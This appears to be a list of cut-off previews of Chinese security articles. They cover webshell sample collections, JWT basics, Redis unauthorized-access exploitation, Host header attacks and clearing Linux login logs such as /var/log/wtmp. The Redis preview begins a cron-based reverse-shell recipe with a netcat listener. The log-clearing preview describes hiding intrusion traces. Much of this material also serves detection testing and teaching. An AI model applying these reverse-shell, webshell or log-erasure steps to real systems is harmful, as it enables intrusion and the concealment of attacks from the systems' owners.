一、核心样本库推荐 1. 多语言综合样本库（5k + 星标） 项目名称：tennc/webshell 核心特点： 覆盖 10 + 脚本语言：ASP、ASPX、PHP、JSP、Perl、Python 等； 包含基础 “一句话”、管理型 WebShell（菜刀、冰蝎客户端）； 附带生成器、加密器等辅助工具。 适用场景：快速搭建测试库、WAF/IDS 识…

一、JWT 基础认知 1. 定义与结构 JSON Web Token（JWT）是一种基于 JSON 的轻量级身份验证令牌，用于在客户端与服务端之间安全传递声明信息，常见于单点登录（SSO）场景。 结构组成：由 3 部分通过.拼接，分别为： Header（头部）：Base64 编码的 JSON，包含令牌类型（typ: "JWT"）和签名算法（alg:…

1. Redis 未授权访问（默认端口 6379） 漏洞特征 默认无密码验证，允许匿名登录； 4.x/5.0.5 前版本支持通过主从复制加载恶意模块执行命令； 高权限运行时可写入系统文件（如计划任务、SSH 密钥）。 利用方式 计划任务反弹 Shell # 本地监听端口 nc -lvp 4444   # 连接目标Redis并写入任务 redis-c…

在网络安全领域，有些漏洞看似不起眼，却可能成为攻击者突破防线的关键。Host 碰撞（Host Header Attack）就是这样一种常被忽视却风险不小的漏洞。它不像 SQL 注入、XSS 那样广为人知，却能让攻击者绕过防护，悄无声息地访问到本不该被暴露的内部资源。今天，我们就来揭开 Host 碰撞的神秘面纱，从原理到防御，全方位搞懂这个漏洞。 一…

一、清除登录日志 登录日志是记录用户登录行为的核心凭证，需针对性清理各类日志文件及相关记录。 1. 核心日志文件及处理方式 （1）二进制日志（记录登录 / 注销及最后登录信息） /var/log/wtmp：对应 last 命令，记录所有用户登录、注销信息（二进制格式）。 处理方式：需用专业工具（如 Linux 登录日志修改脚本）解析二进制结构，精准…